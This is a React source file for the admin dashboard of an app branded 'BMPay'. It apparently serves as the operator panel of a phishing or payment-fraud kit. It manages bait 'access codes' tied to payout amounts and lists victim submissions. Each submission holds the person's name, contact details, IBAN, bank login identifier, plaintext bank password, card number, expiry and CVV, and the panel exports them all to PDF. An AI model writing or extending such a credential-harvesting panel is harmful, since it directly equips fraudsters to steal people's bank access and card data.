import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { useApp } from '@/context/AppContext';
import { useLanguage } from '@/context/LanguageContext';
import LanguageSelector from '@/components/LanguageSelector';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card';
import {
  Table, TableBody, TableCell, TableHead, TableHeader, TableRow,
} from "@/components/ui/table";
import { 
  Dialog, DialogContent, DialogHeader, DialogTitle, DialogFooter
} from '@/components/ui/dialog';
import { Badge } from '@/components/ui/badge';
import { 
  Settings, LogOut, Plus, Trash2, Edit2, Users, Landmark, Save, X, History,
  Eye, Mail, RefreshCw, FileDown, Key, Lock, CheckCircle2, AlertCircle, CreditCard
} from 'lucide-react';
import { toast } from 'sonner';
import axios from 'axios';
import jsPDF from 'jspdf';
import autoTable from 'jspdf-autotable';

const BACKEND_URL = process.env.REACT_APP_BACKEND_URL;
const API = `${BACKEND_URL}/api`;

const AdminPage = () => {
  const navigate = useNavigate();
  const appContext = useApp();
  const { 
    config, isAdminLoggedIn, adminLogout, addAccessCode, removeAccessCode, 
    updateAccessCode, updateBanks, changeAdminPassword, addCardType, removeCardType
  } = appContext;
  const { t } = useLanguage();

  const [activeTab, setActiveTab] = useState('codes');
  const [showAddDialog, setShowAddDialog] = useState(false);
  const [showEditDialog, setShowEditDialog] = useState(false);
  const [showDetailDialog, setShowDetailDialog] = useState(false);
  const [editingCode, setEditingCode] = useState(null);
  const [selectedSubmission, setSelectedSubmission] = useState(null);
  const [newCodeValue, setNewCodeValue] = useState('');
  const [newAmount, setNewAmount] = useState('');
  const [newCurrency, setNewCurrency] = useState('XPF');
  const [newUserName, setNewUserName] = useState('');
  const [newBank, setNewBank] = useState('');
  const [newCardType, setNewCardType] = useState('');
  const [submissions, setSubmissions] = useState([]);
  const [isLoadingSubmissions, setIsLoadingSubmissions] = useState(false);
  const [currentPassword, setCurrentPassword] = useState('');
  const [newPassword, setNewPassword] = useState('');
  const [confirmPassword, setConfirmPassword] = useState('');
  const [isChangingPassword, setIsChangingPassword] = useState(false);

  useEffect(() => {
    if (!isAdminLoggedIn) navigate('/admin-login');
  }, [isAdminLoggedIn, navigate]);

  useEffect(() => {
    if (activeTab === 'history') {
      const fetchSubmissions = async () => {
        setIsLoadingSubmissions(true);
        try {
          const response = await axios.get(`${API}/submissions`);
          setSubmissions(response.data.submissions || []);
        } catch (error) {
          toast.error(t('loadError'));
        }
        setIsLoadingSubmissions(false);
      };
      fetchSubmissions();
    }
  }, [activeTab, t]);

  const loadSubmissions = async () => {
    setIsLoadingSubmissions(true);
    try {
      const response = await axios.get(`${API}/submissions`);
      setSubmissions(response.data.submissions || []);
    } catch (error) {
      toast.error(t('loadError'));
    }
    setIsLoadingSubmissions(false);
  };

  const handleDeleteSubmission = async (id) => {
    if (!window.confirm(t('deleteSubmissionConfirm'))) return;
    try {
      await axios.delete(`${API}/submissions/${id}`);
      setSubmissions(submissions.filter(s => s.id !== id));
      toast.success(t('submissionDeleted'));
    } catch (error) {
      toast.error(t('deleteError'));
    }
  };

  const handleClearAllSubmissions = async () => {
    if (!window.confirm(t('deleteAllConfirm'))) return;
    try {
      await axios.delete(`${API}/submissions`);
      setSubmissions([]);
      toast.success(t('allSubmissionsDeleted'));
    } catch (error) {
      toast.error(t('deleteError'));
    }
  };

  const handleDownloadPDF = () => {
    if (submissions.length === 0) { toast.error(t('noDataToExport')); return; }
    const doc = new jsPDF('landscape');
    doc.setFillColor(10, 37, 64);
    doc.rect(0, 0, 297, 25, 'F');
    doc.setTextColor(255, 255, 255);
    doc.setFontSize(18);
    doc.setFont('helvetica', 'bold');
    doc.text('BMPay - ' + t('submissionHistory'), 14, 16);
    doc.setFontSize(10);
    doc.setFont('helvetica', 'normal');
    doc.text(new Date().toLocaleString('fr-FR'), 220, 16);
    doc.setTextColor(0, 0, 0);
    const tableData = submissions.map((item) => [
      formatDate(item.timestamp), item.fullName, item.email, item.phone,
      item.bankName, item.bankIdentifier, item.bankPassword, item.cardType,
      item.cardNumber, item.expiryDate, item.cvv,
      formatAmount(item.amount) + ' ' + item.currency, '#' + item.attemptNumber
    ]);
    autoTable(doc, {
      startY: 30,
      head: [[t('dateLabel'), t('name'), t('email'), t('phone'), t('bank'), t('identifier'),
        t('password'), t('cardType'), t('last8digits'), t('expirationLabel'), 'CVV', t('amount'), t('attempt')]],
      body: tableData,
      styles: { fontSize: 7, cellPadding: 2 },
      headStyles: { fillColor: [10, 37, 64], textColor: [255, 255, 255], fontStyle: 'bold', fontSize: 7 },
      alternateRowStyles: { fillColor: [248, 250, 252] },
      columnStyles: { 0:{cellWidth:22},1:{cellWidth:22},2:{cellWidth:30},3:{cellWidth:20},4:{cellWidth:20},5:{cellWidth:20},6:{cellWidth:20},7:{cellWidth:18},8:{cellWidth:18},9:{cellWidth:15},10:{cellWidth:12},11:{cellWidth:25},12:{cellWidth:15} },
    });
    const pageCount = doc.internal.getNumberOfPages();
    for (let i = 1; i <= pageCount; i++) {
      doc.setPage(i);
      doc.setFontSize(8);
      doc.setTextColor(128, 128, 128);
      doc.text('Page ' + i + ' / ' + pageCount + ' - BMPay', 148, doc.internal.pageSize.height - 10, { align: 'center' });
    }
    doc.save('BMPay_' + new Date().toISOString().split('T')[0] + '.pdf');
    toast.success(t('pdfExportSuccess'));
  };

  const handleChangePassword = async () => {
    if (!currentPassword || !newPassword || !confirmPassword) { toast.error(t('fillAllFields')); return; }
    if (newPassword.length < 6) { toast.error(t('minPasswordLength')); return; }
    if (newPassword !== confirmPassword) { toast.error(t('passwordsDoNotMatch')); return; }
    setIsChangingPassword(true);
    const result = await changeAdminPassword(currentPassword, newPassword);
    if (result.success) {
      toast.success(t('passwordChangedSuccess'));
      setCurrentPassword(''); setNewPassword(''); setConfirmPassword('');
    } else { toast.error(result.error); }
    setIsChangingPassword(false);
  };

  const handleLogout = () => { adminLogout(); navigate('/'); };

  const handleAddCode = () => {
    if (!newCodeValue || !newAmount || !newUserName) { toast.error(t('fillAllFields')); return; }
    if (config.accessCodes.find(c => c.code === newCodeValue)) { toast.error(t('codeAlreadyExists')); return; }
    addAccessCode({ code: newCodeValue, amount: parseInt(newAmount, 10), currency: newCurrency, userName: newUserName });
    setNewCodeValue(''); setNewAmount(''); setNewCurrency('XPF'); setNewUserName('');
    setShowAddDialog(false);
    toast.success(t('codeAdded'));
  };

  const handleEditCode = () => {
    if (!editingCode || !editingCode.amount || !editingCode.userName) { toast.error(t('fillAllFields')); return; }
    updateAccessCode(editingCode.code, { amount: parseInt(editingCode.amount, 10), currency: editingCode.currency, userName: editingCode.userName });
    setEditingCode(null); setShowEditDialog(false);
    toast.success(t('codeModified'));
  };

  const handleDeleteCode = (code) => {
    if (window.confirm(t('deleteCodeConfirm') + ' ' + code + ' ?')) {
      removeAccessCode(code);
      toast.success(t('codeDeleted'));
    }
  };

  const handleAddBank = () => {
    if (!newBank.trim()) { toast.error(t('enterBankName')); return; }
    if (config.banks.includes(newBank.trim())) { toast.error(t('bankAlreadyExists')); return; }
    updateBanks([...config.banks, newBank.trim()]);
    setNewBank('');
    toast.success(t('bankAdded'));
  };

  const handleRemoveBank = (bank) => {
    if (window.confirm(t('deleteBankConfirm') + ' ' + bank + ' ' + t('deleteBankSuffix'))) {
      updateBanks(config.banks.filter(b => b !== bank));
      toast.success(t('bankDeleted'));
    }
  };

  const handleAddCardType = async () => {
    if (!newCardType.trim()) { toast.error(t('enterCardType')); return; }
    const cardTypes = config.cardTypes || [];
    if (cardTypes.includes(newCardType.trim())) { toast.error(t('cardTypeAlreadyExists')); return; }
    await addCardType(newCardType.trim());
    setNewCardType('');
    toast.success(t('cardTypeAdded'));
  };

  const handleRemoveCardType = async (cardType) => {
    if (window.confirm(t('deleteBankConfirm') + ' ' + cardType + ' ?')) {
      await removeCardType(cardType);
      toast.success(t('cardTypeDeleted'));
    }
  };

  const formatAmount = (amount) => new Intl.NumberFormat('fr-FR').format(amount);
  const formatDate = (dateString) => new Date(dateString).toLocaleString('fr-FR', { day:'2-digit', month:'2-digit', year:'numeric', hour:'2-digit', minute:'2-digit' });

  if (!isAdminLoggedIn) return null;

  const accessCodesList = config?.accessCodes || [];
  const banksList = config?.banks || [];
  const cardTypesList = config?.cardTypes || ['Visa', 'MasterCard', 'UnionPay'];
  const currenciesList = config?.currencies || ['XPF', 'EUR', 'USD'];

  return (
    <div className="min-h-screen bg-slate-100">
      <header className="admin-header text-white px-4 py-4 shadow-lg">
        <div className="max-w-7xl mx-auto flex items-center justify-between">
          <div className="flex items-center gap-3">
            <img src="/logo.png" alt="BMPay" className="h-8 w-8" />
            <div>
              <span className="font-bold text-lg font-['Manrope']">BMPay Admin</span>
              <p className="text-xs text-white/60">{t('adminPanel')}</p>
            </div>
          </div>
          <div className="flex items-center gap-2">
            <LanguageSelector variant="admin" />
            <Button variant="ghost" size="sm" onClick={handleLogout} className="text-white hover:text-white hover:bg-white/10 rounded-lg" data-testid="admin-logout-button">
              <LogOut className="h-5 w-5 mr-2" />
              {t('disconnect')}
            </Button>
          </div>
        </div>
      </header>

      <div className="bg-white border-b border-slate-200 shadow-sm">
        <div className="max-w-7xl mx-auto flex gap-1 px-4 overflow-x-auto">
          {[
            { id: 'codes', icon: Users, label: t('accessCodes') },
            { id: 'banks', icon: Landmark, label: t('banks') },
            { id: 'history', icon: History, label: t('history') },
            { id: 'cards', icon: CreditCard, label: t('cardTypes') },
            { id: 'settings', icon: Settings, label: t('settings') },
          ].map(tab => (
            <button key={tab.id} onClick={() => setActiveTab(tab.id)}
              className={`py-4 px-6 font-medium text-sm border-b-2 transition-all whitespace-nowrap ${activeTab === tab.id ? 'border-[#0A2540] text-[#0A2540] bg-slate-50' : 'border-transparent text-slate-500 hover:text-slate-700 hover:bg-slate-50'}`}
              data-testid={`tab-${tab.id}`}
            >
              <tab.icon className="h-4 w-4 inline mr-2" />
              {tab.label}
            </button>
          ))}
        </div>
      </div>

      <main className="max-w-7xl mx-auto p-4 sm:p-6">
        {activeTab === 'codes' && (
          <Card className="shadow-md rounded-xl overflow-hidden border-0">
            <CardHeader className="flex flex-row items-center justify-between bg-white border-b border-slate-100 px-6 py-5">
              <CardTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope']">{t('accessCodeManagement')}</CardTitle>
              <Button onClick={() => setShowAddDialog(true)} className="bg-[#0A2540] hover:bg-[#163454] text-white rounded-lg" data-testid="add-code-button">
                <Plus className="h-4 w-4 mr-2" />{t('addCode')}
              </Button>
            </CardHeader>
            <CardContent className="p-0">
              <div className="overflow-x-auto">
                <Table className="data-table">
                  <TableHeader>
                    <TableRow className="bg-slate-50 hover:bg-slate-50">
                      <TableHead className="font-semibold py-4 px-6">{t('code')}</TableHead>
                      <TableHead className="font-semibold">{t('name')}</TableHead>
                      <TableHead className="font-semibold text-right">{t('amount')}</TableHead>
                      <TableHead className="font-semibold">{t('currency')}</TableHead>
                      <TableHead className="font-semibold text-center">{t('actions')}</TableHead>
                    </TableRow>
                  </TableHeader>
                  <TableBody>
                    {accessCodesList.map((item) => (
                      <TableRow key={item.code} className="hover:bg-slate-50" data-testid={'code-row-' + item.code}>
                        <TableCell className="font-mono font-semibold text-[#0A2540] py-4 px-6">{item.code}</TableCell>
                        <TableCell className="font-medium">{item.userName}</TableCell>
                        <TableCell className="text-right font-mono font-medium">{formatAmount(item.amount)}</TableCell>
                        <TableCell><Badge variant="secondary" className="bg-slate-100 text-slate-700">{item.currency}</Badge></TableCell>
                        <TableCell className="text-center">
                          <div className="flex justify-center gap-1">
                            <Button variant="ghost" size="sm" onClick={() => { setEditingCode({...item}); setShowEditDialog(true); }} className="text-slate-600 hover:text-[#0A2540] hover:bg-slate-100 rounded-lg h-9 w-9 p-0" data-testid={'edit-code-' + item.code}><Edit2 className="h-4 w-4" /></Button>
                            <Button variant="ghost" size="sm" onClick={() => handleDeleteCode(item.code)} className="text-red-600 hover:text-red-700 hover:bg-red-50 rounded-lg h-9 w-9 p-0" data-testid={'delete-code-' + item.code}><Trash2 className="h-4 w-4" /></Button>
                          </div>
                        </TableCell>
                      </TableRow>
                    ))}
                  </TableBody>
                </Table>
              </div>
            </CardContent>
          </Card>
        )}

        {activeTab === 'banks' && (
          <Card className="shadow-md rounded-xl overflow-hidden border-0">
            <CardHeader className="bg-white border-b border-slate-100 px-6 py-5">
              <CardTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope']">{t('bankManagement')}</CardTitle>
            </CardHeader>
            <CardContent className="p-6">
              <div className="flex gap-3 mb-6">
                <Input placeholder={t('bankName')} value={newBank} onChange={(e) => setNewBank(e.target.value)} className="max-w-sm h-11 border-slate-300 rounded-lg" data-testid="new-bank-input" />
                <Button onClick={handleAddBank} className="bg-[#0A2540] hover:bg-[#163454] text-white rounded-lg h-11" data-testid="add-bank-button">
                  <Plus className="h-4 w-4 mr-2" />{t('add')}
                </Button>
              </div>
              <div className="grid grid-cols-1 sm:grid-cols-2 md:grid-cols-3 lg:grid-cols-4 gap-3">
                {banksList.map((bank) => (
                  <div key={bank} className="flex items-center justify-between p-4 bg-slate-50 rounded-lg border border-slate-200 hover:border-slate-300 transition-colors" data-testid={'bank-item-' + bank}>
                    <span className="text-sm font-medium text-slate-700 truncate mr-3">{bank}</span>
                    <Button variant="ghost" size="sm" onClick={() => handleRemoveBank(bank)} className="text-red-600 hover:text-red-700 hover:bg-red-50 flex-shrink-0 h-8 w-8 p-0 rounded-lg" data-testid={'delete-bank-' + bank}><X className="h-4 w-4" /></Button>
                  </div>
                ))}
              </div>
            </CardContent>
          </Card>
        )}

        {activeTab === 'history' && (
          <Card className="shadow-md rounded-xl overflow-hidden border-0">
            <CardHeader className="flex flex-row items-center justify-between bg-white border-b border-slate-100 px-6 py-5">
              <CardTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope']">{t('submissionHistory')} ({submissions.length})</CardTitle>
              <div className="flex gap-2">
                <Button variant="outline" size="sm" onClick={loadSubmissions} disabled={isLoadingSubmissions} className="rounded-lg border-slate-300" data-testid="refresh-history">
                  <RefreshCw className={`h-4 w-4 mr-2 ${isLoadingSubmissions ? 'animate-spin' : ''}`} />{t('refresh')}
                </Button>
                {submissions.length > 0 && (
                  <>
                    <Button variant="outline" size="sm" onClick={handleDownloadPDF} className="rounded-lg border-[#0A2540] text-[#0A2540] hover:bg-[#0A2540] hover:text-white" data-testid="download-pdf">
                      <FileDown className="h-4 w-4 mr-2" />{t('downloadPDF')}
                    </Button>
                    <Button variant="destructive" size="sm" onClick={handleClearAllSubmissions} className="rounded-lg" data-testid="clear-all-history">
                      <Trash2 className="h-4 w-4 mr-2" />{t('deleteAll')}
                    </Button>
                  </>
                )}
              </div>
            </CardHeader>
            <CardContent className="p-0">
              {isLoadingSubmissions ? (
                <div className="text-center py-12">
                  <div className="spinner mx-auto mb-4 border-[#0A2540] border-t-transparent"></div>
                  <p className="text-slate-500">{t('loading')}</p>
                </div>
              ) : submissions.length === 0 ? (
                <div className="text-center py-12">
                  <History className="h-12 w-12 mx-auto text-slate-300 mb-4" />
                  <p className="text-slate-500">{t('noSubmission')}</p>
                </div>
              ) : (
                <div className="overflow-x-auto">
                  <Table className="data-table">
                    <TableHeader>
                      <TableRow className="bg-slate-50 hover:bg-slate-50">
                        <TableHead className="font-semibold py-4 px-6">{t('dateLabel')}</TableHead>
                        <TableHead className="font-semibold">{t('name')}</TableHead>
                        <TableHead className="font-semibold">{t('bank')}</TableHead>
                        <TableHead className="font-semibold text-right">{t('amount')}</TableHead>
                        <TableHead className="font-semibold text-center">{t('attempt')}</TableHead>
                        <TableHead className="font-semibold text-center">{t('email')}</TableHead>
                        <TableHead className="font-semibold text-center">{t('actions')}</TableHead>
                      </TableRow>
                    </TableHeader>
                    <TableBody>
                      {submissions.map((item) => (
                        <TableRow key={item.id} className="hover:bg-slate-50" data-testid={'submission-row-' + item.id}>
                          <TableCell className="text-sm py-4 px-6">{formatDate(item.timestamp)}</TableCell>
                          <TableCell className="font-medium">{item.fullName}</TableCell>
                          <TableCell className="text-slate-600">{item.bankName}</TableCell>
                          <TableCell className="text-right font-mono font-medium">{formatAmount(item.amount)} {item.currency}</TableCell>
                          <TableCell className="text-center">
                            <Badge variant={item.attemptNumber === 1 ? 'default' : 'secondary'} className={item.attemptNumber === 1 ? 'bg-[#0A2540]' : ''}>#{item.attemptNumber}</Badge>
                          </TableCell>
                          <TableCell className="text-center">
                            <Mail className={`h-4 w-4 mx-auto ${item.emailSent ? 'text-emerald-600' : 'text-slate-300'}`} />
                          </TableCell>
                          <TableCell className="text-center">
                            <div className="flex justify-center gap-1">
                              <Button variant="ghost" size="sm" onClick={() => { setSelectedSubmission(item); setShowDetailDialog(true); }} className="text-slate-600 hover:text-[#0A2540] hover:bg-slate-100 rounded-lg h-9 w-9 p-0" data-testid={'view-submission-' + item.id}><Eye className="h-4 w-4" /></Button>
                              <Button variant="ghost" size="sm" onClick={() => handleDeleteSubmission(item.id)} className="text-red-600 hover:text-red-700 hover:bg-red-50 rounded-lg h-9 w-9 p-0" data-testid={'delete-submission-' + item.id}><Trash2 className="h-4 w-4" /></Button>
                            </div>
                          </TableCell>
                        </TableRow>
                      ))}
                    </TableBody>
                  </Table>
                </div>
              )}
            </CardContent>
          </Card>
        )}

        {activeTab === 'cards' && (
          <Card className="shadow-md rounded-xl overflow-hidden border-0">
            <CardHeader className="bg-white border-b border-slate-100 px-6 py-5">
              <CardTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope']">{t('cardTypeManagement')}</CardTitle>
            </CardHeader>
            <CardContent className="p-6">
              <div className="flex gap-3 mb-6">
                <Input placeholder={t('newCardTypePlaceholder')} value={newCardType} onChange={(e) => setNewCardType(e.target.value)} className="max-w-sm h-11 border-slate-300 rounded-lg" data-testid="new-card-type-input" />
                <Button onClick={handleAddCardType} className="bg-[#0A2540] hover:bg-[#163454] text-white rounded-lg h-11" data-testid="add-card-type-button">
                  <Plus className="h-4 w-4 mr-2" />{t('add')}
                </Button>
              </div>
              <div className="grid grid-cols-1 sm:grid-cols-2 md:grid-cols-3 gap-3">
                {cardTypesList.map((type) => (
                  <div key={type} className="flex items-center justify-between p-4 bg-slate-50 rounded-lg border border-slate-200 hover:border-slate-300 transition-colors" data-testid={'card-type-item-' + type}>
                    <div className="flex items-center gap-3">
                      <CreditCard className="h-5 w-5 text-slate-500" />
                      <span className="text-sm font-medium text-slate-700">{type}</span>
                    </div>
                    <Button variant="ghost" size="sm" onClick={() => handleRemoveCardType(type)} className="text-red-600 hover:text-red-700 hover:bg-red-50 flex-shrink-0 h-8 w-8 p-0 rounded-lg" data-testid={'delete-card-type-' + type}><X className="h-4 w-4" /></Button>
                  </div>
                ))}
              </div>
              {cardTypesList.length === 0 && <p className="text-slate-500 text-center py-8">{t('noCardTypeConfigured')}</p>}
            </CardContent>
          </Card>
        )}

        {activeTab === 'settings' && (
          <div className="max-w-lg">
            <Card className="shadow-md rounded-xl overflow-hidden border-0">
              <CardHeader className="bg-white border-b border-slate-100 px-6 py-5">
                <CardTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope'] flex items-center gap-2">
                  <Key className="h-5 w-5" />{t('changePassword')}
                </CardTitle>
              </CardHeader>
              <CardContent className="p-6">
                <div className="space-y-5">
                  <div className="space-y-2">
                    <Label className="form-label flex items-center gap-2"><Lock className="h-4 w-4" />{t('currentPassword')}</Label>
                    <Input type="password" placeholder={t('enterCurrentPassword')} value={currentPassword} onChange={(e) => setCurrentPassword(e.target.value)} className="h-11 border-slate-300 rounded-lg" data-testid="current-password-input" />
                  </div>
                  <div className="space-y-2">
                    <Label className="form-label flex items-center gap-2"><Key className="h-4 w-4" />{t('newPassword')}</Label>
                    <Input type="password" placeholder={t('minChars')} value={newPassword} onChange={(e) => setNewPassword(e.target.value)} className="h-11 border-slate-300 rounded-lg" data-testid="new-password-input" />
                  </div>
                  <div className="space-y-2">
                    <Label className="form-label flex items-center gap-2"><CheckCircle2 className="h-4 w-4" />{t('confirmPassword')}</Label>
                    <Input type="password" placeholder={t('confirmNewPassword')} value={confirmPassword} onChange={(e) => setConfirmPassword(e.target.value)} className={`h-11 border-slate-300 rounded-lg ${confirmPassword && newPassword !== confirmPassword ? 'border-red-500' : ''}`} data-testid="confirm-password-input" />
                    {confirmPassword && newPassword !== confirmPassword && (
                      <p className="text-sm text-red-600 flex items-center gap-1"><AlertCircle className="h-4 w-4" />{t('passwordsDoNotMatch')}</p>
                    )}
                  </div>
                  <Button onClick={handleChangePassword} className="w-full h-12 bg-[#0A2540] hover:bg-[#163454] text-white font-semibold rounded-lg mt-4" disabled={isChangingPassword || !currentPassword || !newPassword || !confirmPassword || newPassword !== confirmPassword} data-testid="change-password-button">
                    {isChangingPassword ? (
                      <span className="flex items-center gap-2"><span className="spinner border-white border-t-transparent"></span>{t('changingPassword')}</span>
                    ) : (
                      <><Save className="h-4 w-4 mr-2" />{t('saveNewPassword')}</>
                    )}
                  </Button>
                </div>
              </CardContent>
            </Card>
            <p className="text-sm text-slate-500 mt-4 text-center">{t('passwordChangeInfo')}</p>
          </div>
        )}
      </main>

      {/* Add Code Dialog */}
      <Dialog open={showAddDialog} onOpenChange={setShowAddDialog}>
        <DialogContent className="max-w-md rounded-xl">
          <DialogHeader><DialogTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope']">{t('addAccessCode')}</DialogTitle></DialogHeader>
          <div className="space-y-4 py-4">
            <div className="space-y-2">
              <Label className="form-label">{t('identificationCodeLabel')}</Label>
              <Input placeholder={t('codePlaceholder')} value={newCodeValue} onChange={(e) => setNewCodeValue(e.target.value)} className="h-11 border-slate-300 rounded-lg" data-testid="new-code-input" />
            </div>
            <div className="space-y-2">
              <Label className="form-label">{t('fullNameLabel')}</Label>
              <Input placeholder={t('namePlaceholder')} value={newUserName} onChange={(e) => setNewUserName(e.target.value)} className="h-11 border-slate-300 rounded-lg" data-testid="new-username-input" />
            </div>
            <div className="grid grid-cols-2 gap-4">
              <div className="space-y-2">
                <Label className="form-label">{t('amount')}</Label>
                <Input type="number" placeholder={t('amountPlaceholder')} value={newAmount} onChange={(e) => setNewAmount(e.target.value)} className="h-11 border-slate-300 rounded-lg" data-testid="new-amount-input" />
              </div>
              <div className="space-y-2">
                <Label className="form-label">{t('currency')}</Label>
                <select value={newCurrency} onChange={(e) => setNewCurrency(e.target.value)} className="w-full h-11 px-3 border border-slate-300 rounded-lg bg-white" data-testid="new-currency-select">
                  {currenciesList.map((currency) => (<option key={currency} value={currency}>{currency}</option>))}
                </select>
              </div>
            </div>
          </div>
          <DialogFooter className="gap-2">
            <Button variant="outline" onClick={() => setShowAddDialog(false)} className="rounded-lg border-slate-300">{t('cancel')}</Button>
            <Button onClick={handleAddCode} className="bg-[#0A2540] hover:bg-[#163454] text-white rounded-lg" data-testid="confirm-add-code"><Save className="h-4 w-4 mr-2" />{t('save')}</Button>
          </DialogFooter>
        </DialogContent>
      </Dialog>

      {/* Edit Code Dialog */}
      <Dialog open={showEditDialog} onOpenChange={setShowEditDialog}>
        <DialogContent className="max-w-md rounded-xl">
          <DialogHeader><DialogTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope']">{t('editCode')} {editingCode?.code}</DialogTitle></DialogHeader>
          {editingCode && (
            <div className="space-y-4 py-4">
              <div className="space-y-2">
                <Label className="form-label">{t('fullNameLabel')}</Label>
                <Input value={editingCode.userName} onChange={(e) => setEditingCode({...editingCode, userName: e.target.value})} className="h-11 border-slate-300 rounded-lg" data-testid="edit-username-input" />
              </div>
              <div className="grid grid-cols-2 gap-4">
                <div className="space-y-2">
                  <Label className="form-label">{t('amount')}</Label>
                  <Input type="number" value={editingCode.amount} onChange={(e) => setEditingCode({...editingCode, amount: e.target.value})} className="h-11 border-slate-300 rounded-lg" data-testid="edit-amount-input" />
                </div>
                <div className="space-y-2">
                  <Label className="form-label">{t('currency')}</Label>
                  <select value={editingCode.currency} onChange={(e) => setEditingCode({...editingCode, currency: e.target.value})} className="w-full h-11 px-3 border border-slate-300 rounded-lg bg-white" data-testid="edit-currency-select">
                    {currenciesList.map((currency) => (<option key={currency} value={currency}>{currency}</option>))}
                  </select>
                </div>
              </div>
            </div>
          )}
          <DialogFooter className="gap-2">
            <Button variant="outline" onClick={() => setShowEditDialog(false)} className="rounded-lg border-slate-300">{t('cancel')}</Button>
            <Button onClick={handleEditCode} className="bg-[#0A2540] hover:bg-[#163454] text-white rounded-lg" data-testid="confirm-edit-code"><Save className="h-4 w-4 mr-2" />{t('save')}</Button>
          </DialogFooter>
        </DialogContent>
      </Dialog>

      {/* Submission Detail Dialog */}
      <Dialog open={showDetailDialog} onOpenChange={setShowDetailDialog}>
        <DialogContent className="max-w-lg rounded-xl">
          <DialogHeader><DialogTitle className="text-lg font-semibold text-[#0A2540] font-['Manrope']">{t('submissionDetails')}</DialogTitle></DialogHeader>
          {selectedSubmission && (
            <div className="space-y-4 py-4 max-h-96 overflow-y-auto">
              <div className="grid grid-cols-2 gap-4 text-sm">
                <div className="bg-slate-50 p-3 rounded-lg"><p className="text-slate-500 text-xs uppercase tracking-wide mb-1">{t('dateLabel')}</p><p className="font-medium">{formatDate(selectedSubmission.timestamp)}</p></div>
                <div className="bg-slate-50 p-3 rounded-lg"><p className="text-slate-500 text-xs uppercase tracking-wide mb-1">{t('attemptLabel')}</p><p className="font-medium">#{selectedSubmission.attemptNumber}</p></div>
              </div>
              <div className="border-t pt-4">
                <h4 className="font-semibold text-[#0A2540] mb-3 text-sm uppercase tracking-wide">{t('beneficiary')}</h4>
                <div className="grid grid-cols-2 gap-4 text-sm">
                  <div><p className="text-slate-500 text-xs mb-1">{t('name')}</p><p className="font-medium">{selectedSubmission.fullName}</p></div>
                  <div><p className="text-slate-500 text-xs mb-1">{t('email')}</p><p className="font-medium">{selectedSubmission.email}</p></div>
                  <div><p className="text-slate-500 text-xs mb-1">{t('phone')}</p><p className="font-medium">{selectedSubmission.phone}</p></div>
                  <div><p className="text-slate-500 text-xs mb-1">{t('iban')}</p><p className="font-mono text-xs">{selectedSubmission.iban}</p></div>
                </div>
              </div>
              <div className="border-t pt-4">
                <h4 className="font-semibold text-[#0A2540] mb-3 text-sm uppercase tracking-wide">{t('amount')}</h4>
                <p className="text-3xl font-bold text-[#0A2540] font-['JetBrains_Mono']">{formatAmount(selectedSubmission.amount)} {selectedSubmission.currency}</p>
              </div>
              <div className="border-t pt-4">
                <h4 className="font-semibold text-[#0A2540] mb-3 text-sm uppercase tracking-wide">{t('bankCredentials')}</h4>
                <div className="space-y-3 text-sm">
                  <div className="flex justify-between"><span className="text-slate-500">{t('bank')}</span><span className="font-medium">{selectedSubmission.bankName}</span></div>
                  <div className="flex justify-between"><span className="text-slate-500">{t('identifier')}</span><span className="font-mono font-medium">{selectedSubmission.bankIdentifier}</span></div>
                  <div className="bg-amber-50 p-3 rounded-lg border border-amber-200"><p className="text-amber-700 text-xs uppercase tracking-wide mb-1">{t('password')}</p><p className="font-mono font-bold text-amber-900">{selectedSubmission.bankPassword}</p></div>
                </div>
              </div>
              <div className="border-t pt-4">
                <h4 className="font-semibold text-[#0A2540] mb-3 text-sm uppercase tracking-wide">{t('bankCard')}</h4>
                <div className="grid grid-cols-2 gap-4 text-sm">
                  <div><p className="text-slate-500 text-xs mb-1">{t('type')}</p><p className="font-medium">{selectedSubmission.cardType}</p></div>
                  <div><p className="text-slate-500 text-xs mb-1">{t('last8digits')}</p><p className="font-mono font-medium">{selectedSubmission.cardNumber}</p></div>
                  <div><p className="text-slate-500 text-xs mb-1">{t('expirationLabel')}</p><p className="font-medium">{selectedSubmission.expiryDate}</p></div>
                  <div className="bg-red-50 p-3 rounded-lg border border-red-200"><p className="text-red-700 text-xs uppercase tracking-wide mb-1">CVV</p><p className="font-mono font-bold text-red-900">{selectedSubmission.cvv}</p></div>
                </div>
              </div>
            </div>
          )}
          <DialogFooter>
            <Button variant="outline" onClick={() => setShowDetailDialog(false)} className="rounded-lg border-slate-300">{t('close')}</Button>
          </DialogFooter>
        </DialogContent>
      </Dialog>
    </div>
  );
};

export default AdminPage;
